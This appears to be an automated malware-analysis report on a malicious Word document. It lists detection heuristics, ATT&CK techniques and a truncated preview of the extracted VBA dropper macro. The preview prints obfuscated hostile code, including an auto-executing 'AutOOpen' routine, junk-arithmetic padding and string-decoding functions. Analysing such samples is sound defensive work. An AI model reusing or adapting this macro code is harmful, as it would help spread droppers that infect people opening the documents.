MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document containing VBA macros. The document body and heuristics indicate a lure to enable macros, a common tactic for malware droppers. The VBA macro 'AutOOpen' is present and configured to execute upon opening, likely to download and execute a second-stage payload. The presence of 'CreateObject' and 'CallByName' calls within the macro further suggests malicious intent.
Heuristics 9
-
ClamAV: Doc.Dropper.Agent-6581558-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6581558-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9312 bytes |
SHA-256: c3f100af113f914a265279db3855c6f2c8e96a8d5d075b72d08f7b942347cb64 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
domino1964
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
End Sub
Attribute VB_Name = "ACCEPTED"
Function accessruy()
accessruy = nake3344
End Function
Function nake3344()
nake3344 = guest1974(xytroftu.buggerme)
End Function
Function crack_serial()
crack_serial = xytroftu.waswas
End Function
Function luctynbu()
luctynbu = gogoose1.xaza1111
End Function
Function chicojosie(cleissin, wambapvo)
linksenior = Left(cleissin, wambapvo)
chicojosie = legendagp(linksenior)
End Function
Function legendagp(plankpin)
legendagp = Right(plankpin, 1)
End Function
Function portroas()
portroas = "/usgc;]x]/lEmaQR/aE.]/"
End Function
Attribute VB_Name = "aveidlegiB"
Function nymphroa(servroor As String, NZIsxFonq As Integer) As String
Dim Gjyznysq As Integer
Gjyznysq = 0
suzuki100 = 17 + 43
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
For botanistbotanist = 1 To 90
If (chicojosie(ninvaude, botanistbotanist) = servroor) Then
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
Gjyznysq = botanistbotanist
Exit For
End If
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
Next botanistbotanist
Gjyznysq = IIf(Gjyznysq - NZIsxFonq <= 0, 90 + Gjyznysq - NZIsxFonq, Gjyznysq - NZIsxFonq)
nymphroa = chicojosie(ninvaude, Gjyznysq)
End Function
Function liophia5()
liophia5 = pedanaeb.AVEEKERUHC
End Function
Function mygodfen(vonabloT, AVONUBED, cfmrnb69, jaxmeoff)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
gogoose1.tralcodg = lawstorm(vonabloT, AVONUBED) + cassie169(vonabloT, cfmrnb69) + anesabya(jaxmeoff)
End Function
Sub domino1964()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
pedanaeb.vanomerd = "ourlomeb"
End Sub
Attribute VB_Name = "Flawacid"
Function sublessee(mrjrb827, fooldelta)
sublessee = ationdri(Int((mrjrb827 * churedro()) + fooldelta))
End Function
Function ationdri(anyzrata)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
ationdri = CInt(anyzrata)
End Function
Function lawstorm(chenabcd, ajaxdude)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
lawstorm = guest1974(gogoose1.cancerfrog) + chenabcd + guest1974(tiggerisp.kinsscri) + _
ajaxdude + guest1974(gogoose1.gogueacr + gogoose1.signtist) + ajaxdude
End Function
Function anesabya(attilapat)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
anesabya = guest1974(portroas + xytroftu.BBCFKUJC) + attilapat + _
guest1974(xytroftu.AVOKNELOBE) + attilapat + guest1974(pedanaeb.moczeegi)
End Function
Function ninvaude()
ninvaude = pedanaeb.ruxcontrol
End Function
Attribute VB_Name = "gogoos
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.